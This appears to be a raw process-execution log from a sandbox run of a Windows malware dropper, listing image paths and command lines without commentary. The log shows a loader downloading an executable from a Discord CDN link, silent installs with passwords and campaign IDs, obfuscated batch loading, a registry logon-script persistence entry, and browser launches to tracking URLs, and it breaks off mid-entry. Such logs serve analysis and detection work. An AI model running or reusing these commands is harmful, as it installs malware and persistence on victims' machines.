C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe
C:\Users\Admin\Documents\36df74ehacftfwkeEZENknGR.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 6056 -ip 6056
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5016 -ip 5016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 7400 -ip 7400
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6024 -ip 6024
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6024 -s 284
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 296
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 7628 -ip 7628
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 2BDE09EBF1D97E917DA6B08AC652AB0C C
C:\Users\Admin\AppData\Roaming\8205194.exe
"C:\Users\Admin\AppData\Roaming\8205194.exe"
C:\Users\Admin\AppData\Roaming\5422328.exe
"C:\Users\Admin\AppData\Roaming\5422328.exe"
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Users\Admin\AppData\Roaming\5980817.exe
"C:\Users\Admin\AppData\Roaming\5980817.exe"
C:\Users\Admin\AppData\Local\Temp\is-ISPVM.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-ISPVM.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Roaming\2665877.exe
"C:\Users\Admin\AppData\Roaming\2665877.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 292
C:\Users\Admin\AppData\Local\Temp\is-FNQ6G.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-FNQ6G.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\6710\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\BD07.tmp\BD08.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\is-I61CT.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-I61CT.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5S9HJ.tmp\Setup.tmp" /SL5="$202C4,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-ISPVM.tmp\Setup.exe" /silent /subid=720
C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JT7OM.tmp\Setup.tmp" /SL5="$40508,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-FNQ6G.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Users\Admin\AppData\Local\Temp\251A.exe
C:\Users\Admin\AppData\Local\Temp\251A.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5136 -ip 5136
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6831E2CF1B0E8CCA4F06F326073CBA90 C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 272
C:\Users\Admin\AppData\Local\Temp\3DA4.exe
C:\Users\Admin\AppData\Local\Temp\3DA4.exe
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 5329ECC82126A5A2E3E06E4FE246706F C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-HP6V7.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 548 -p 7012 -ip 7012
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 622D8E927F8F9D44FCB85A082A11AD15
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 440 -ip 440
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 440 -s 292
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe
"C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe" /VERYSILENT
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 7012 -s 2460
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\8a-852a6-bb1-a489f-3df4324588e61\Cibysoxyla.exe
"C:\Users\Admin\AppData\Local\Temp\8a-852a6-bb1-a489f-3df4324588e61\Cibysoxyla.exe"
C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P9QUF.tmp\ultramediaburner.tmp" /SL5="$2047A,281924,62464,C:\Program Files\Windows Media Player\NABQKOXRFC\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\8e-de339-92d-af89c-13c1ce2fc47b1\Laebigibudae.exe
"C:\Users\Admin\AppData\Local\Temp\8e-de339-92d-af89c-13c1ce2fc47b1\Laebigibudae.exe"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-O9JLM.tmp\{app}\vdi_compiler"
C:\Users\Admin\AppData\Local\Temp\7753.exe
C:\Users\Admin\AppData\Local\Temp\7753.exe
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 664 -p 3608 -ip 3608
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3952 -ip 3952
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 6964 -ip 6964
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6964 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3952 -s 2408
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3608 -s 2372
C:\Users\Admin\AppData\Local\Temp\8723.exe
C:\Users\Admin\AppData\Local\Temp\8723.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6064 -ip 6064
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 276
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 5168 -ip 5168
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe
"C:\Users\Admin\Documents\rS8DTVJPDzvY5pdmMeaCTtGM.exe"
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{36c7c2f0-fafa-244a-87d2-80335cb59059}\oemvista.inf" "9" "4d14a44ff" "000000000000014C" "WinSta0\Default" "0000000000000160" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x1a4,0x1f0,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 6944 -ip 6944
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164" "c070"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6944 -s 2212
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 364 -p 3096 -ip 3096
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2812 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3128 /prefetch:1
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3096 -s 304
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4460 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prlrk1ku.rzx\GcleanerEU.exe /eufive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe /qn CAMPAIGN="654" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffef07d46f8,0x7ffef07d4708,0x7ffef07d4718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4aatpbft.aog\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6016 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe
C:\Users\Admin\AppData\Local\Temp\iri2b1nj.3gl\installer.exe /qn CAMPAIGN="654"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\prlrk1ku.rzx\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\prlrk1ku.rzx\GcleanerEU.exe /eufive
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F2F0442D9959C6952BFB1C07C43908E1 C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 6636 -ip 6636
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6636 -s 276
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lfwem0qs.nfc\askinstall52.exe & exit
C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe
C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\i24nbx41.0on\anyname.exe" -q
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kw1jrwmk.0bs\gcleaner.exe /mixfive & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\lfwem0qs.nfc\askinstall52.exe
C:\Users\Admin\AppData\Local\Temp\lfwem0qs.nfc\askinstall52.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 7600 -ip 7600
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tyonff5j.0fb\autosubplayer.exe /S & exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7600 -s 868
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2032,6469706790585278938,10717392717822540548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5920 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
